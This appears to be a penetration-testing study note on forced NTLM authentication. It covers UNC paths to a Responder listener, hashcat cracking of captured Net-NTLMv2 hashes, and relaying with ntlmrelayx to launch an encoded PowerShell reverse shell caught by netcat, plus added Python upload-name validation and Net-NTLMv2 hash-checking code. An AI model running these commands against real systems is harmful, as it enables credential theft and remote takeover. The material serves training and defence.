If we've obtained code execution on a remote system, we can easily force it to authenticate with us by commanding it to connect to our prepared SMB server.
```bash
\\192.168.45.173\share # assuming responder is listening on that IP
```
If we don't have code execution, we can also use other vectors to force an authentication. For example, when we discover a *file upload* form in a web application on a Windows server, we can try to submit a non-existent file with a **UNC path** like the one below. If the web application supports uploads via SMB, the Windows server will authenticate to our SMB server.
```bash
\\192.168.45.173\share\nonexistent.txt
```
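The server-side check that closes the upload vector just described, as an added example that is not part of the original note: it reduces a submitted upload name to a bare filename and rejects anything that would make the Windows server open a network location (`\\host\share`, `//host/share`, `file://` and similar schemes, including percent-encoded forms). The sample inputs are constructed; the function name `safe_filename` and the allowed-character policy are assumptions, not taken from any particular web framework.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Remote-location forms a Windows file API will resolve for the caller:
#   \\host\share\file, //host/share/file, \\?\UNC\host\share, file://host/share, smb://host/share
REMOTE_RE = re.compile(r'^(\\\\|//|[A-Za-z][A-Za-z0-9+.-]*://)')
# Assumed policy: plain alphanumeric names with dots, dashes and underscores only.
ALLOWED_NAME = re.compile(r'^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$')


def normalize(value: str) -> str:
    # Percent-decode twice so %5C%5C (or %255C%255C) cannot hide a leading \\, then trim.
    for _ in range(2):
        value = unquote(value)
    return value.strip()


def is_remote_path(value: str) -> bool:
    """True when the submitted name would make the server open a network location."""
    return bool(REMOTE_RE.match(normalize(value)))


def safe_filename(value: str) -> Optional[str]:
    """Reduce an untrusted upload name to a bare filename, or None when it must be rejected."""
    v = normalize(value)
    if is_remote_path(v):
        return None  # forced-authentication vector: never resolve \\host\share on the caller's behalf
    name = re.split(r'[\\/]', v)[-1]  # drop any directory part, whether local or remote
    if name in ('', '.', '..') or not ALLOWED_NAME.match(name):
        return None
    return name


if __name__ == '__main__':
    # Constructed inputs: the UNC trick from the note, encoded variants, and benign names.
    samples = [
        r'\\192.168.45.173\share\nonexistent.txt',
        '//192.168.45.173/share/nonexistent.txt',
        '%5C%5C192.168.45.173%5Cshare%5Cnonexistent.txt',
        'file://192.168.45.173/share/nonexistent.txt',
        r'C:\Users\paul\report.pdf',
        '../../etc/passwd',
        'report.pdf',
    ]
    for s in samples:
        print(f'{s!r:55} -> {safe_filename(s)!r}')
```

Anything that comes back as `None` should be rejected before the filename is joined to the upload directory; local directory parts are simply discarded, since only the final component is ever used.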
# When we have code execution - example
Run [[responder]] as **sudo**, since it needs elevated privileges for the raw socket operations it performs
```bash
sudo responder -I tun0
```
On the remote Windows system:
```powershell
dir \\192.168.45.173\test
```
Responder output:
```
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:192.168.50.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash : paul::FILES01:1f9d4c51f6e...
```
Crack the hash with hashcat (mode 5600 is NetNTLMv2):
```bash
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
```
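To make explicit what Responder captured above and what `hashcat -m 5600` actually computes, here is an added example (not part of the original note) that implements the Net-NTLMv2 calculation from MS-NLMP, parses a capture line in the `user::domain:challenge:NTProofStr:blob` format, and checks candidate passwords against it. The username and domain are taken from the Responder output above; the password, server challenge, blob and wordlist are constructed for the demo. It also shows the property the relay section below relies on: the same password under a different server challenge produces a different response, so a captured value is only useful at the moment of the exchange.

```python
import hashlib
import hmac
import struct
from typing import Dict, Iterable, Optional

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Plain MD4 (RFC 1320); carried inline because OpenSSL 3 builds of hashlib often lack it."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rot(x, n):
        x &= MASK
        return ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b'\x80'
    msg += b'\x00' * ((56 - len(msg) % 64) % 64) + struct.pack('<Q', len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack('<16I', msg[off:off + 64])
        r = list(state)
        for func, const, order, shifts in rounds:
            for i in range(16):
                t = (-i) % 4  # a, d, c, b: the state word rewritten in this step
                val = r[t] + func(r[(t + 1) % 4], r[(t + 2) % 4], r[(t + 3) % 4]) + x[order[i]] + const
                r[t] = rot(val, shifts[i % 4])
        state = [(s + v) & MASK for s, v in zip(state, r)]
    return struct.pack('<4I', *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password. This value is never on the wire; Responder does not see it."""
    return md4(password.encode('utf-16-le'))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode('utf-16-le'), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 of server challenge || client blob under the NTLMv2 key."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_5600(line: str) -> Dict[str, object]:
    """Split a Responder / hashcat -m 5600 line: user::domain:challenge:NTProofStr:blob (hex fields)."""
    user, _, domain, challenge, proof, blob = line.strip().split(':')
    return {'user': user, 'domain': domain, 'challenge': bytes.fromhex(challenge),
            'proof': bytes.fromhex(proof), 'blob': bytes.fromhex(blob)}


def check_candidate(line: str, candidate: str) -> bool:
    """What every hashcat guess does: recompute NTProofStr for the candidate and compare."""
    c = parse_5600(line)
    expected = nt_proof(candidate, c['user'], c['domain'], c['challenge'], c['blob'])
    return hmac.compare_digest(expected, c['proof'])


def recover_password(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary check over a wordlist; returns the matching password or None."""
    return next((w for w in wordlist if check_candidate(line, w)), None)


def make_capture(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build the line Responder prints for one exchange (constructed here for the demo)."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f'{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}'


# Constructed stand-ins for a real capture: an 8-byte server challenge and a minimal NTLMv2
# blob (real blobs carry a timestamp and AV pairs; the computation is the same).
CHALLENGE = bytes.fromhex('1122334455667788')
BLOB = bytes.fromhex('0101000000000000') + bytes(8) + bytes.fromhex('a1b2c3d4e5f60718') + bytes(4)

if __name__ == '__main__':
    line = make_capture('paul', 'FILES01', 'Summer2024!', CHALLENGE, BLOB)
    print(line)
    print('recovered:', recover_password(line, ['123456', 'password', 'Summer2024!']))
    # Same password, different server challenge: the response changes, so a captured value
    # cannot be replayed later; ntlmrelayx has to forward it while the target is still waiting.
    other = make_capture('paul', 'FILES01', 'Summer2024!', bytes.fromhex('8877665544332211'), BLOB)
    print('proof changes with challenge:', parse_5600(other)['proof'] != parse_5600(line)['proof'])
```

Only the NT hash, which is never transmitted, would allow pass-the-hash; the captured NTProofStr is bound to one server challenge and is either cracked by re-running this computation per candidate or relayed during the live exchange, which is exactly why the note moves on to relaying when cracking fails.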
# When we do not have code execution but file upload - example
![[Pasted image 20251208205859.png]]
![[Pasted image 20251208210039.png]]
![[Pasted image 20251208210050.png]]
---
# Relaying Net-NTLMv2
Let's assume that we obtained the **Net-NTLMv2** hash but couldn't crack it because the password was too complex. We can try to use the hash on another machine in what is known as a *relay attack*.
In this attack, we will again use the *dir* command in the shell to create an SMB connection to our Kali machine. Instead of printing the hash used in the authentication step, we forward the authentication to the remote target host.
If `UAC remote restrictions` are enabled on the target, only the *local Administrator* user can be used for the relay attack.
- `--no-http-server`: disable the HTTP server since we are relaying an SMB connection
- `-smb2support`: add support for SMB2
- `-t`: target
- `-c`: set our command, here it's using *base64-encoded PowerShell reverse shell one-liner*
```bash
impacket-ntlmrelayx --no-http-server -smb2support -t $IP -c "powershell -enc JABjAGwAaQBlAG4AdA..."
```
Catch the reverse shell on the listener:
```bash
nc -lvnp 4444
```
### UAC Remote Restrictions
- A security mechanism present since Windows Vista
- When a local administrator account connects remotely, its administrative privileges are stripped
- A local administrator account stays the same account no matter what it is renamed to, and it is common for many computers to share the same password for it. In that case, once an attacker obtains the NTLM hash or the password, they can simply connect to every other PC over SMB and gain administrative rights. To prevent this, when an account in the local Administrators group logs on remotely it is granted only a `restricted token`. In other words, even a local administrator is effectively treated as a standard user.